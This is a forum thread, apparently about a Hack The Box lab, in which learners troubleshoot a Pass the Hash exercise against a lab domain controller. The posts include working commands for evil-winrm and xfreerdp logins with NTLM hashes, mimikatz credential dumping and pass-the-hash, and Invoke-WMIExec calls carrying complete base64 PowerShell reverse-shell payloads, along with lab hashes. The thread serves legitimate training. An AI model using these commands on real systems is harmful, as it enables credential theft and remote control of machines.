Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01)

Hello all

As many people have said, some tasks seem to be particularly difficult which can be very frustrating, although giving the opportunity to hone micro techniques (being what I keep in mind to provide motivation), this question has got the better of me for too long now.

I will provide a sequence of methods, commands and outcomes undertaken and can someone pleasee let me know where I’m going wrong here :smile:. I feel as though I’m completing everything correctly but still cant manage to catch a shell.

  1. Firstly, Im using evil-winrm to change the restricted admin mode with the following commands:

evil-winrm -i 10.129.204.23 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

  1. Next, I’m using xfreerdp to RDP to the machine using the following command:

xfreerdp /v:10.129.204.23 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453

  1. Following this, I’m dumping NTLM hashes using mimikatz and with the following commands:

privilege::debug

sekurlsa::logonPasswords full

  1. This gives me the NTLM hashes for 4 user accounts (I wont provide the hashes here to avoid spoilers):

MS01
julio
david
john

  1. Next, I RDP using julios creds as per the question.

  2. From which I try to initiate a pass the hash (PTH) using mimikatz and with MS01 creds (this is to enable the lister with MS01 as the user as the question states that the machine will only connect back to MS01). This executes with no errors, however when whoami is passed, the user printed is still julio (to try and mitigate error I tried the same process when RDPing using admin creds which allowed me to PTH into MS01). This was done using the following command:

mimikatz.exe privilege::debug “sekurlsa::pth /user:MS01 /rc4:27306e8dad558c047eb35761abb16fc1 /domain:inlanefreight.htb /run:cmd.exe” exit

  1. A nc listner is configured to listen on any 8001.

  2. Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in powershell3 base64 rev shell gen - 127.16.1.5:8001):

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e ‘’‘base64 here’‘’”

Note: all instances of cmd and ps are run as admin.

I have tried this sequence various times, on my local machine and with the pwnbox and I just cant get it to work. I’m thinking my error lies in step 6 where I cant PTH to MS01.

Thanks for taking the time to read and all help appreciated :pray: :facepunch:

4 Likes

I’m not sure, pretty stuck on the part as well. Last question and it sucks, Ill try once more.

Make sure to generate your own shell using https://www.revshells.com/ . I couldn’t get it to work with the shell provided in their notes, even though the IP and ports used were identical. I generated my own and came right up.

Hi,
did you get the solution for this task?
i’m stuck from a week, can you please suggest some hint if you have completed this task

Try using a different port than 8001 when generating your reverse shell and setting your listener (port could be in use).

have you solved your problem?

Yeah, are you looking for some help? Let me know and I’ll have a look over my notes when home later

I have solved this problem. thank you, took few hours to understand.

I had some issues to with this and these steps helped me:
removed the -domain flag.
kept the user as julio
added -verbose to troubleshoot
did an Import-Module .\Invoke-TheHash.psd1 in Powershell.

For the raw shell. I picked Powershell #3 on left hand list. In the shell drop down pick “powershell” and left the encoding drop box set to none. I also changed my port 9434. You want to use the IP of the attack windows host. Then I copied just the encoded block into the example shown into the section an updated the parameters/flags accordingly.

Can anyone explain to me in a logical manner what is the ask in the last question of PtH section:

Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

Let’s go step by step, following the instructions:

  1. Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console

I am logged in through xfreerdp to 10.129.131.149 with user “Administrator” and password “30B3783CE2ABF1AF70F77D0660CF3453”. My interpretation the instruction is the following:

c:\tools>.\mimikatz.exe "privilege:debug" "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:powershell.exe" exit
  1. import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01)

I go to the required site and I generate a revshell as instructed:

Then I open a nc listener:

c:\tools>nc.exe -lvnp 9999
listening on [any] 999 ...

And try to send and catch the reverse shell as follows:

PS C:\tools\Invoke-TheHash> Import-Module .\Invoke-WMIExec.ps1
PS C:\tools\Invoke-TheHash> Invoke-WMIExec -Target 172.16.1.10 -DOMAIN inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwAOQA5ADkAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

A connection attempt is seem to be try to happen, but not matter how long I wait or how many ports I change it never goes through:

I am stuck here for hours on end!

1 Like

From where you have gotten to in the listener try “hostname” remember you’re looking for DC01.
You can message me directly if you still need further instruction

I got it ‘solved’, I just had to press “Enter” for the prompt to appear :joy:!

2 Likes

It’s been a while since I completed this lab but I’m sure the issue I was having had something to do with the powershell script/syntax. In the lesson htb provides multiple examples of ps scripts with slightly different syntax which is easily overlooked. Try using the other examples. Hope this helps :heart:

1 Like

hello,
I’m stuck at the same place and can’t move forward. Help would be great.

Just got it right after 3 hours…
Be carefull to not leave blank spaces when filling the parameters for the payload on revshells.
First RDP to the box with the Admin user and its hash.
This is the sintax for mimikatz:

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:powershell.exe" exit

then you will get a powershell instance to do:

  • Import-Module .\Invoke-WMIExec.ps1 or Import-Module .\Invoke-TheHash.psd1
    then start your listener and type (Replace the b64 with your generated payload):
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwAOAAwADAAOQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

You should get the revshell!

the revshell its against this IP 176.16.1.5

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwAMgA4ADIAOAAyACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==” and then, open a cmd in the same target, write whoami;hostname

and then must appear “inlanefreight\julio
DC01”…

then “type C:\julio\flag.txt”

and there is!! =D